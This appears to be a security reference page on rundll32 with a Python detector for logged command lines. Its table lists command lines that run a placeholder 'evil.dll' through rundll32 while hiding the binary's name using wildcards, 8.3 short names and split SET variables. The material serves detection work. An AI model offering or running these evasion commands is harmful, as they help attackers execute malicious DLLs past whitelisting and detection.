rundll32
Loads and runs DLLs. Used to execute malicious DLL exports directly, bypassing application whitelisting.
Binary Paths
C:\Windows\System32\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe
Glob Patterns
| Pattern | Notes |
|---|---|
| `for /f %i in ('where rundll3?.exe') do %i` | Wildcard replaces '2' |
| `for /f %i in ('where r*32.exe') do %i` | Star matches 'undll' |
| `for /f %i in ('where rundll*.exe') do %i` | Star matches '32' |
| `for /f %i in ('dir /b C:\Windows\System32\rundll*.exe') do %i` | dir glob search |
| `for %i in (C:\Windows\System32\rundll*.exe) do @%i evil.dll,DllMain` | Native CMD for loop with filesystem glob — expands rundll*.exe directly in System32 without where.exe |
| `for /f %i in ('where /r C:\Windows rundll*.exe') do %i evil.dll,DllMain` | Recursive where search across Windows tree — finds rundll32.exe in System32 and SysWOW64 |
| `forfiles /p C:\Windows\System32 /m rundll*.exe /c "@file evil.dll,DllMain"` | forfiles * mask finds rundll32.exe — @file expands to matched filename for DLL execution |
| `C:\Windows\System32\RUNDLL~1.EXE evil.dll,DllMain` | 8.3 SFN — RUNDLL~1 auto-generated for rundll32.exe; requires NtfsDisable8dot3NameCreation=0 |
| `set a=rundll& set b=32& call %a%%b%.exe evil.dll,DllMain` | Binary name split across two SET variables — CALL resolves %a%%b%.exe=rundll32.exe; name never appears as a literal string |
| `cmd /c for /f %i in ('where rundll*.exe') do %i evil.dll,DllMain` | cmd /c wrapper adds an extra process layer — glob resolves via where; parent process becomes cmd.exe not the caller |
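
For detection, the patterns in the table reduce to three checks on a logged command line: a wildcard token that would expand to rundll32.exe, an 8.3 short name, and a name assembled from SET variables. The Python below is an added example, not a rule from this page or from any product; the function names, tag names and the sample command lines (built from the table rows plus two benign lines) are assumptions made for illustration.

```python
import fnmatch
import re

TARGET = "rundll32.exe"
SFN_RE = re.compile(r"\brundll~\d\.exe\b", re.IGNORECASE)        # RUNDLL~1.EXE
SET_RE = re.compile(r"\bset\s+(\w+)=([^&|]*)", re.IGNORECASE)    # set a=rundll
VAR_RE = re.compile(r"%(\w+)%")                                  # %a%

def glob_hits(cmdline):
    """Return wildcard tokens whose file-name part would expand to rundll32.exe."""
    hits = []
    for token in re.split(r"[\s'\"()]+", cmdline.lower()):
        name = token.rsplit("\\", 1)[-1]          # drop any directory prefix
        stem = name.rsplit(".", 1)[0]
        has_wildcard = "*" in name or "?" in name
        # Skip catch-all masks such as *.exe: the stem must keep a literal character.
        has_literal = bool(re.search(r"[a-z0-9]", stem))
        if has_wildcard and has_literal and fnmatch.fnmatchcase(TARGET, name):
            hits.append(name)
    return hits

def expand_set_vars(cmdline):
    """Apply same-line SET assignments to %var% references, as CALL would."""
    values = {k.lower(): v for k, v in SET_RE.findall(cmdline)}
    return VAR_RE.sub(lambda m: values.get(m.group(1).lower(), m.group(0)), cmdline)

def classify(cmdline):
    """Return sorted tags naming how the command line reaches rundll32.exe."""
    lowered = cmdline.lower()
    tags = set()
    if glob_hits(cmdline):
        tags.add("glob")
    if SFN_RE.search(cmdline):
        tags.add("8.3-name")
    if TARGET not in lowered and TARGET in expand_set_vars(cmdline).lower():
        tags.add("set-split")
    if not tags and TARGET in lowered:
        tags.add("literal")
    return sorted(tags)

# Constructed sample command lines (table rows plus two benign lines).
SAMPLES = [
    "for /f %i in ('where rundll3?.exe') do %i",
    r"C:\Windows\System32\RUNDLL~1.EXE evil.dll,DllMain",
    "set a=rundll& set b=32& call %a%%b%.exe evil.dll,DllMain",
    r"for %i in (C:\Logs\*.txt) do @type %i",
    "rundll32.exe shell32.dll,Control_RunDLL",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

Run it over process-creation command lines; the image path recorded for the child process still shows the resolved rundll32.exe, so an empty result here does not mean rundll32 was not started.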
YARA Rule
Auto-generated detection rule for rundll32